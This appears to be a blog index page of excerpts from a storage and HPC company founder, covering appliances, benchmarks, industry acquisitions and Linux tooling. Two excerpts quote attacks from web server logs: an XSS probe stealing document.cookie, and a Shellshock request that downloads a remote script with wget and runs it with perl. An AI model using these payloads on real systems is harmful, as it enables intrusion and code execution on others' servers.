foreach investor (list_of_investors) { if (investor->says_yes_sends_term_sheet_and_check) { put_money_to_work_building_value() } else { add_to_list_of_investors_who_didnt_say_yes_and_follow_through_with_money() } } This is pseudo code for the algo you need. Any answer which is yes is good.
Posts
Bots on Amazon?
Seeing lots of these in my web server logs:
https://scalableinformatics.com/?p=%3Cscript%3Ealert(document.cookie)%3C/script%3E which are sent there from a sentinel redirection mechanism on a different web server. A number, maybe 10 or so? Amazon hosts are now doing this. I am guessing this would be real darned easy to trace back to the sources. And either someone’s instance in the cloud is not under their control, or someone is paying Amazon to let them run bots.
Posts
Watching dracut, udev, systemd, and plymouth all battle each other for nfs/ramboot
I can’t even begin to describe the complete and utter broken-ness of this mess. This doesn’t look like systemd issue, its just the poor stack trying to get everything else working. But plymouth. Seriously. It should be given the old-yeller treatment. And watching udev not … settle … is … amusing. While its doing that, the dracut options of debug, drop to a shell, break, etc. aren’t working. This isn’t engineering at this point.
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 0 1 95 5 0 0| 513M 0 | 480B 0 | 0 0 | 10k 20k 4 2 94 0 0 0| 0 0 | 480B 0 | 0 0 |5238 721 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4913 352 0 2 98 0 0 0| 0 0 | 570B 90B| 0 0 |4966 613 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4912 413 0 2 98 0 0 0| 0 0 | 584B 92B| 0 0 |4965 334 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4914 306 0 2 98 0 0 0| 0 0 | 636B 147B| 0 0 |4969 483 0 2 98 0 0 0| 0 0 | 570B 0 | 0 0 |4915 377 8 8 50 32 0 2|7520k 8382M| 578B 0 | 0 0 | 76k 215k 9 7 30 52 0 3|8332k 12G| 960B 132B| 0 0 | 109k 279k 10 5 29 53 0 2|4136k 12G| 240B 0 | 0 0 | 109k 277k 12 6 29 51 0 2|4208k 12G| 240B 0 | 0 0 | 108k 280k 11 6 31 50 0 2|2244k 12G| 330B 90B| 0 0 | 109k 281k 11 6 30 50 0 3|2272k 13G| 240B 0 | 0 0 | 110k 281k Writes around 12.
Posts
10TB PMR drives for Unison #hpc #storage systems, think 600TB/4U unit with @BeeGFS, @Ceph, and others
WD/HGST just released details on a PMR (aka “real”, non-archive class) hard disk. You can read the specs here. We will be offering these in Unison HPC storage systems, to provide up to 600TB/4U unit, or up to 6PB per rack of 10 unison chassis. Coupled with our 100Gb fabric, we expect to be able to drive about 8-9 GB/s per chassis. And thats before we leverage the distributed journaling/metadata NVMe’s rear mounted on the units.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many thing I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Massive Unapologetic Firepower part 3: Forte
Forte has uncloaked, website is being updated. You can email me (landman@scalableinformatics.com) for more info. Pictures speak louder than words. Have a look.
That is 20+ GB/s for streaming sequential IO. Then, 4kB random reads …
That is, 5+ Million IOPs. Specs include Price point for this is $50k for 48TB, $1/GB. Pre-order now, shipping in a few weeks.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison) * 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system * 100Gb connection to a partner/customer booth * Forte 100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Moving inventory out to make room for new stuff
We have a bunch of units to move out. These are from a recent POC project, and we have a new architecture project that needs all that rack space and then some … the team are building Franken-boxen clients for this project, so we have enough requestors on the network. Parts start arriving next week for that, and we really need to clear this out soon. I hate seeing good gear sitting idle on a storage shelf when it could be helping solve hard problems.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances * Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance * Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance * Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
Just give me a huge fast storage system, and a mighty network to delivery it by
A system in the lab. Here is a snapshot from our management GUI.
[ ](/images/unison-poc-system.png)
A couple things to note:
In the lower right corner, you can see the size of the /mnt/unison file system. This is an all flash system. No, there is no compression, nor dedup going on here. We could, but most of the use cases we are dealing with these days … this would not be a win.
Posts
Looking forward to showing off a new product at SC15
Think … pretty interesting performance … Think very … very dense … Think … there may be some benchies leaked here soon.
Posts
M&A: Huge ... WD acquires SanDisk
This is huge. Now Seagate has a relationship with Micron, Toshiba has its own disks and shares a fab with SanDisk (though I think with this acquisition, that will rapidly change). Ok … so the HD vendors are busy snapping up the Flash makers. Is Micron next? Rumors of something have been swirling for a while. Note also, SanDisk has their InfiniFlash unit. WD simply did not have storage appliances. This gets them into that space, and directly competing with the likes of all the smaller startup all flash array (AFA) vendors.
Posts
Finding needles in haystacks covered in a fallen down barn
Ok … this one was very annoying. Imagine you are trying to diagnose a system crash on a production unit. The crash is quite specific in the subsystems … being one where the interrupt handler catches an exception, and then you start piling up softirq contexts. Its on the network side of things. You discover that the switch and the NIC are, somehow, incredibly, not quite compatible with each other. I can’t assign blame for this as I don’t know who is at fault.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliot Management (e.g. they wanted more return on their investment). As part of the increasing the return and value return to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
The end of java in the browser
Coming soon. Mozilla is turning off NPAPI support at the end of next year. Java and java applets rely upon NPAPI to work. Needless to say, Java support in the browser is going to end. While this is good news, they are still going to allow flash. Which is less good. What is interesting about this, is that this sunsets support for many of the remote console applications that depend upon Java (for the moment) to provide KVM like capabilities.
Posts
End days must be on hand ... Perl 6 is out
see for more details. I’d love to find a valid reason to play with it, but my near term foci are going to remain our current code base in Perl/C, nodejs for a few things, Julia/R for analysis. The joke about Perl 6 shipping by Christmas is now over … as the correct response has been “what year”. Until this year it seems.
Posts
M&A: Cleversafe is snarfed up by IBM
Cleversafe was acquired by IBM. Looks like 200 people making their way over. This is huge, as now Scality is basically the last independent standing, and I am guessing they won’t be alone for long.
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
Inventory to sell to make room: Cadence and several Unison/JackRabbits
Very fast units, very reasonable prices. We are (again) running out of space in our lab, and really need to move this stuff out. Many of these have been demo/engineering machines for us, including the portable petabyte unit. We’ve got a Cadence box with 16TB of storage, which puts up performance numbers that other vendors would kill for …
https://twitter.com/sijoe/status/606221680533508096
and
https://twitter.com/sijoe/status/606222084587388928
We’ve got the portable petabyte unit available (albeit with less than 1 PB).
Posts
Unison Ceph beats reference architecture, including the flavor with NVMe drives
The paper is here. We focused on our product mix and the rough comparables in the report. Our units are immediately available as well, preloaded/preconfigured with Ceph. The takeaway is this:
[ ](https://scalableinformatics.com/assets/documents/Unison-Ceph-Performance.pdf)
Whats really interesting in this is that the 36+2 reference architecture makes use of 2x NVMe drives. And as you can see, they really don’t help much in the tests. This is not to say NVMe is bad; its not.
Posts
Nominate your favorite HPC product and company for a readers choice award
Please go here and nominate! Last year, our customer Lucera, won best in Financial Services. We built the vast majority of their infrastructure, so we like to think we contributed in some manner to their success. This year, please don’t hesitate to nominate us (or second/third/etc.) for Best HPC Storage Product of Technology for Scalable Informatics Unison product, or whatever you’d like. In addition to the nomination for Unison in storage, I put in nominations for Cadence in Financial Services, and in Data Intensive computing.
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
IPO: Pure Storage files
Not really an HPC/Big Data play (yet). But they have filed. The traditional array market is in a decline, and depending upon how you view it, its either merely a steep decline, or an out-and-out death spiral. The tier1 vendors are defending a shrinking turf against aggressive smaller and more focused players. Moreover, flash is set to overtake disk in terms of lower cost to deploy in very short order. This plays well for folks like Pure and a few others, though the market they are playing in is in decline.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
Build debugging thoughts
Our toolchain that we use for providing up to date and bug-reduced versions of various tools for our appliances have a number of internal testing suites. These suites do a pretty good job of exercising code. When you build Perl, and the internal modules and tools, tests are done right then and there, as part of the module installation. Sadly not many languages do this yet, I think Julia, R, and a few others might.
Posts
Insanely awesome project and product
This is one of Scalable Informatics FastPath Unison systems, well the bottom part. The top are clients we are using to test with.
[ ](/images/flashy.jpg)
Each of the servers at the bottom is a 4U with 54 physical 2.5 inch 6g/12g SAS or SATA SSDs. We have 5 of these units in the picture. And a number of SSDs on the way to fill them up. Think 0.2PB usable of flash.
Posts
Playing "guess which wire I just pulled" isn't fun
Even less fun when the boxes are half a world away. Yeah, this was my weekend and a large chunk of today. This will segue into another post on design and (unintended) changes in design, and end user expectations at some point. Its hard to maintain a concept of an SLO if some of the underlying technology you are relying upon to deliver these objectives (like, I dunno, a wire?), suddenly disappears on you.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Tools for linux devops: lsbond.pl
Slowly and surely, I am scratching the itches I’ve had for a while with regards to data extraction from a running system. One of the big issues I deal with all the time is to extract what the state and components (and their states) of a linux network bond. Its an annoying combination of /sys/class/net, /proc/net/bonding/, and ethtool/ip commands. So I decided to simplify it.
bond0: mac 00:11:22:33:44:55 state up mode load balancing (xor) xmit_hash layer2+3 (2) polling 100 ms up_delay 200 ms down_delay 200 ms ipv4 10.
Posts
Day job growing
We brought on a new business development and sales manager today. Actually based in Michigan. Looking forward to great things from him, and we are all pretty excited!
Posts
Baidu attack deflection
So Baidu’s web crawler is broken. Makes the bad old days of bing bot look positively benign. Wasn’t pushing much load, but lots of log spam and it showed signs of increasing over time. So, out comes the ban hammer. Then I thought, why not report their broken bot to them. Should be as simple as an email, or a web page. Sure enough, they have links for filling out forms to indicate that their web crawler is going crazy.
Posts
M&A or more correctly, acqui-hire: Cray bags much of Terascala
Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales. Put their code upon their partners hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation … unless their boxes were entirely undifferentiated, where it would reduce their overall costs to avoid selling undifferentiated hardware.
Posts
Potential M&A: Micron being pursued
I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential that is). Well, there are 4 basic Flash fabs out there these days.
Posts
Fixing Baidu's broken search bot
It seems that the bot was generating some effectively random broken URLs. Or maybe not so random. I saw endpoints in the logs that haven’t been in use for at least 7 years. I can’t imagine this was simply a harmless bug, as much as … maybe? … a search for moved/renamed endpoints? As the web server is now done very differently than in the past, the missing endpoints merely generated log spam.
Posts
Blog post title of the day ... Any Sufficiently Advanced Technology ...
I am a huge fan of Charles Stross’s (@cstross) Laundry series (and most of what he writes in general), and just finished his latest over the weekend. Up on his blog, he had a guest author write a post while he was stuck in traffic or similar. The title of the entry wins the internets today.
Yup, definitely a winner …
Posts
Most of our traffic on the day job site now comes from Baidu
Well, their web crawler. Way way back in the day, I complained about broken bing-bots. This was 8 years ago. Bing was fairly crappy at crawling, and seems to have improved. Google is still the lightest touch. Least impactful. Deeply in the traffic noise. Not Baidu. There bot is, for lack of a better term, broken. Its not into DoS levels, but it is wasting traffic/resources, and providing lots of log spam.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
Portable PetaByte systems update
As a reminder, the day job has 1PB dense and fast (20GB/s and above)storage systems available for about $0.25/GB fully supported, delivered, and installed. All you need to provide is power and a network connection. I should note that we’ve delivered all flash versions of these as well as hybrid versions for various use cases. We will have an update on these leveraging our greater density options, including 2.3PB/rack fully supported for 3 years, with shipping and installation for under $600k USD, as well as a 1PB flash version in 1-2 racks.
Posts
takes a licking and keeps on ticking
One of our systems at a customer site.
$ uptime 15:47:33 up 407 days, 3:23, 2 users, load average: 0.19, 0.10, 0.06 $ uname -r 3.10.36.scalable
Posts
A new thing to occupy my time
Doesn’t have to be a code golf mechanism, but this looks like fun!
Posts
Thoughts on a Thursday
We’ve been doing the startup thing for a hair under 13 years now. Most of the time we’ve been self funded, and recently we took a small investment in a friends and family round (angel.co link here). What occurs to me, after we soft announced our 100GbE results via a Mellanox PR today, is that we’ve been building the types of high performance platforms that enable end users to do bigger and better things for the whole time.
Posts
Interesting conversation with a customer about our siRouter
They are turning their SDN concept into one of the most incredible technologies around, a tremendous competitive advantage for them over others in their space. I had been under the impression that they were running everything on their (quite awesome) 10/40GbE switches. These are SDN capable switches from a very well funded SDN switch startup. Turns out, their SDN stack is actually running on siRouter. They are doing some very cool bits on the software stack side, and getting about 2 microseconds port to port.
Posts
Our 100GbE flash storage appliance benchmarks discussed
See the PR bit here (http://www.hpcwire.com/off-the-wire/new-mellanox-performance-benchmarks-released/ for the link impaired) This is a Unison Ceph appliance ( http://scalableinformatics.com/unison ) and they are available and shipping now. Please reach out to us if you’d like to discuss. And yes, this is the world’s first 100GbE storage appliance, or storage server SAN device if you prefer. Easily one of the fastest systems in market. [Update] Forgot to mention, this is a set of units bought by a customer, and at their site.
Posts
Day job is hiring
Business development/sales role for now. See here (url: https://scalableinformatics.com/bus-dev in case you don’t see the link) for more details. Prefer New York, Chicago, Boston, or nearby. No relocation.
Posts
SIOS v2.0 running pxe booted
Our SIOS (Linux based OS, usually based upon Debian) has just been updated for jessie (Debian 8). This was necessary to support rkt, docker, etc. in addition to our other bits. Its been cooking in the background for a while, for, as you might have noticed from my posting frequency, I’ve been busy. But we are up, and running. Base distro version here:
root@usn-ramboot:~# df -h Filesystem Size Used Avail Use% Mounted on tmpfs 8.
Posts
Off to Chicago for The Trading Show
Looking forward to our booth #243 at the Trading Show in Chicago. We’ll have a FastPath Cadence time series analytics unit with us. Should be fun!
Posts
M&A: Avago grabbed Broadcom, Intel grabs Altera
Avago continues its acquisition spree. Broadcom (network chipsets and NPUs, CPUs, etc.). This is looking like a more integrated semiconductor IP play here. They grabbed LSI, and shed the non-chippery bits. They grabbed PLX. And Emulex. As they say, curiouser and curiouser. This makes perfect sense to me, and given the other acquisition announced today, I am going to bet they will be talking (at least) to Xilinx. And then there’s Intel.
Posts
Massive, Unapologetic Firepower: part 3, the network
Take the worlds fastest hyperconverged storage-compute server. Mix into this the worlds fastest networking. What do you get? (hint: something you can order today)
~# iperf -c 192.168.1.1 -l128k -w 512k -P10 -t 4 ------------------------------------------------------------ Client connecting to 192.168.1.1, TCP port 5001 TCP window size: 1.00 MByte (WARNING: requested 512 KByte) ------------------------------------------------------------ [ 11] local 192.168.1.2 port 50804 connected with 192.168.1.1 port 5001 [ 4] local 192.168.1.2 port 50796 connected with 192.
Posts
Been heads down working very hard on something very cool
More soon. We’ll post here, with some basic results. Insanely cool stuff.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
Nebula shuts down
Nebula, a cloud “appliance” (and company) has shut down. The software is open source, so their customers can pay others to provide support, or migrate to another stack. This isn’t a public cloud company, rather a private cloud company. There is little operational risk in moving from one openstack build to another. Feel free to reach out to me (landman @ scalability.org) privately if you need to speak to someone about this.
Posts
M&A: Convey snapped up by Micron
Rich at InsideHPC has the story. There is a good fit for Micron, as they are rapidly turning into one of the stronger players in the space. As I had noted, the storage OEMs are either buying into vertical integration or partnering to make it happen. Convey is actually a natural fit given other of Micron’s projects. The big question is, for the OEMs not going this route, or waiting to go this route, will that strategy work?
Posts
Announcement of new storage appliance
More information in our video (linked here in case the video doesn’t embed properly, you may need to enable flash and scripting on the page to see it embed*). Also, check out the page at the day job:
we don’t do google or other analytics (just local stuff here), so this shouldn’t be a security issue. Let us know if you believe otherwise.
Posts
M&A: Blekko grabbed by IBM for Watson
Have a look at the page. Blekko was started by a number of people including Greg Lindahl having spent many years in the HPC world. He’s another recovering physical scientist (astronomer as I remember). This is interesting as it gives a sense as to where IBM sees its future. They aren’t (it looks like to me) trying to compete with google, rather, trying to add interesting capability to Watson. They see Watson and things derived from it as their future.
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in an as minimal footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, integrate them into a larger FastPath Unison system We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
Π day has come
I like Π … apple, cherry, etc. For those whom don’t get the pun, dates in the US are often written as Month/Day/Year, with year being abbreviated by 2 digits. So with this formatting, today is 3/14/15, or roughly the first 5 digits of Π, which is defined to be the ratio of circumference to diameter of circle on a 2D plane. You can extend the pun, by noting at 9:26.
Posts
A completely unsolved problem
contact management across multiple devices/OSes/applications. Yeah, I know, just use iCloud/Gmail/etc. Except they are all broken. And not a little bit. I rely upon one, consistent, correct contact list that has email, phone, etc. for all the people I know and communicate with. In years past, I’ve had this list sync back and forth to Gmail via google. And it used to work. Then iPhone5 and well, ya know, it broke.
Posts
Scalable Informatics customer Milford Film and Animation does awesome projects
Its nice to hear success stories from our customers. In this case, our friends and customers at Milford Film and Animation have been using our systems for a number of years to provide the basis for their storage efforts. Their systems are very computationally, network, and IO intensive. There is a tremendous amount of rendering, editing, and many other things that require absolutely the highest performance you can get in a dense package.
Posts
My vote for most awesome Mac OSX software
Karabiner If you switch back and forth between Linux and Mac on same keyboard, this is an absolute must have. From my perspective, the keys in Mac are horribly borked. Home and End do not do what I expect. Control-Anything doesn’t work except in exceptional cases. iTerm2 (also very good Mac software) largely does the right thing on its own, but the keyboard side of MacOSX is basically borked. This lets you unbork it.
Posts
Memory channel flash: is it over?
[full disclosure: day job has a relationship with Diablo] Russell just pointed this out to me. The short (pedestrian) version (I’ve got no information that is not public, so I can’t disclose something I don’t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk as they bought Smart Storage, whom worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an, at least temporary, injunction against Diablo.
Posts
New all-flash-array: SanDisk's Infiniflash
Interesting development from SanDisk. Not quite an M&A; bit, but an attempt at accelerating adoption of non-spinning storage by bringing out a proof of concept product in a few flavors. They are aiming at $2/GB for this system. This is an array product though, so you need to attach it to a set of servers. Also, for something this large, the spec’s are kind of disappointing. 7GB/s maximum and 1M IOPs.
Posts
M&A: HGST acquires Amplidata
This is closer to home. Amplidata is an erasure coded cold storage system atop “cheap” hardware. HGST makes, of course, storage devices. This continues a trend in vertical integration of folks with systems experience, and folks who make the things that go into these systems. If you control more of the stack, you can create more value to your bottom line … up to a point. The flip side to this is if you start competing with your customers.
Posts
M&A Avago (the LSI acquirers) just bought Emulex
Ok, this is starting to look like someone is buying up the tech behind storage and storage networking on the hardware side. Avago acquired LSI in 2013, and now they’ve done and grabbed Emulex. Emulex has a large FC capability, but I can’t imagine that this is the only reason for this buy. They also have converged network adapters, RDMA and offload capability, and other bits. They are an OEM to many large vendors.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Hype at the speed of hype, or big data marketing and media
There was a great post on the marketing of big data by John Foreman on his blog. I found it a very enjoyable read for one … and it showed that hype is a self-similar phenomenon. No matter what topic it is in, some people will try to generate and exploit the generated hype, regardless of the true information content associated with it. I could shake my head, but I’ve seen this, many times over my career.
Posts
Shakes head, chuckles ... yeah, we couldn't see that one coming ...
Just to get this out of the way, apart from this ideologically and politically charged debasement of real science, I am and remain firmly a “believer”* that the earths climate has changed, has been changing, will change, and continue to change with or without our input. Moreover, our climate has gone through some remarkable changes over its existence, all lovingly preserved in one way or another in the fossil record, and through mechanisms that effectively store state of a system.
Posts
Coraid may be going down
According to The Register. No real differentiation (AoE isn’t that good, and the Seagate/Hitachi network drives are going to completely obviate the need for such things). We once used and sold Coraid to a customer. The linux client side wasn’t stable. iSCSI was coming up and was actually quite a bit better. We moved over to it. This was during our build vs buy phase. We weren’t sure if we could build a better box.
Posts
The Interview (no, not that one!)
Rich at InsideHPC.com (you do read it daily, don’t you?) just posted our (long) interview from SC14. Have a look at it here (http://insidehpc.com/2015/01/video-scalable-informatics-steps-io-sc14/) . As a reminder, Portable PetaBytes are for sale! And yes, the response has been quite good … More soon … And no, we aren’t going to hack anyone
Posts
Micro, Meso, and Macro shifts
The day job lives at a crossroads of sorts. We design, build, sell, and support some of the fastest hyperconverged (aka tightly coupled) storage and computing systems in market. We’ve been talking about this model for more than a decade, and interestingly, the market for this has really taken off over the last 12 months. The idea is very simple. Keep computing, networking, and storage very tightly tied together, and enable applications to leverage the local (and distributed) resources at the best possible speed.
Posts
Inventory reduction @scalableinfo
Its that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
The #PortablePetaByte : Coming to a data center near you!
As seen at SC14. We have our Portable PetaByte systems available for sale. Half rack to many racks, 1 PB and upwards, 20GB/s and up. Faster with SSDs. See the link above!
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Heres why.
swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
Posts
#sc14 T-minus 2 days and counting #HPCmatters
On the plane down to NOLA. Going to do booth setup, and then network/machine/demo setup. We’ll have a demo visualfx reel from a customer whom uses Scalable Informatics JackRabbit, DeltaV (and as the result of an upgrade yesterday), Unison. Looking forward to getting everything going, and it will be good to see everyone at the show!
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
Mixing programming languages for fun and profit
I’ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I’ve been looking for some simple drawing libraries in javascript to make this higher level, so I don’t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldly … as javascript doesn’t quite have all the constructs one might expect from a modern language.
Posts
turnkey, low cost and high density 1PB usable at 20+ GB/s sustained
Fully turnkey, we’d ship a rack with everything pre-installed/configured. Some de-palletizing required, but its plug and play (power, disks) after that. More details, and a sign up to get a formal quote here. This would be in 24U of rack space for less than $0.18/raw GB or $0.26/usable GB. Single file system name space, a single mount point. Leverages BeeGFS, and we have VMs to provide CIFS/SMB access, as well as NFS access, in addition to BeeGFS native client.
Posts
Velocity matters
For the last decade plus, the day job has been preaching that performance is an advantage, a feature you need, a technological barrier for those with both inefficient infrastructures and built in resistance to address these issues. You find the latter usually at organizations with purchasing groups that dominate the users and the business owners. The advent of big data, (ok, this is what the second or third time around now) with data sets that have been pushing performance capabilities of infrastructure has been putting the exclamation point on this for the past few years.
Posts
A good read on a bootstrapped company
Zoho makes a number of things, including a CRM, that we use. And they are bootstrapped. Like us. There are significant market differences between us and them, but many of the things noted in the article are common truths.
If you don’t start with building a real company, you won’t have a real company. The decisions you make when your own ass is on the line are very different from the ones you might make if its someone elses ass, and money for that matter.
Posts
There are times
… when during a support call, we see the magnitude of the self-inflicted damage, and ask ourselves exactly why did they do this to themselves? Today was like this. We do what we can to protect people from the dangerous rapidly moving sharp objects underneath the hood (or boot). We abstract things, tell them not to put fingers near the spinny blades. Yes, its a metaphor. Today was a day of Pyrrhic victories.
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
... and the shell shock attempts continue ...
From 174.143.168.121 (174-143-168-121.static.cloud-ips.com)
Request: '() { :;}; /bin/bash -c "wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache"'
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and its very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if its RAIDed in hardware/software. Its a pathway that can fail. And when it fails, all hell breaks loose.
Posts
That may be the fastest I've seen an exploit go from "theoretical" to "used"
Found in our web logs this afternoon. This is bash shellshock.
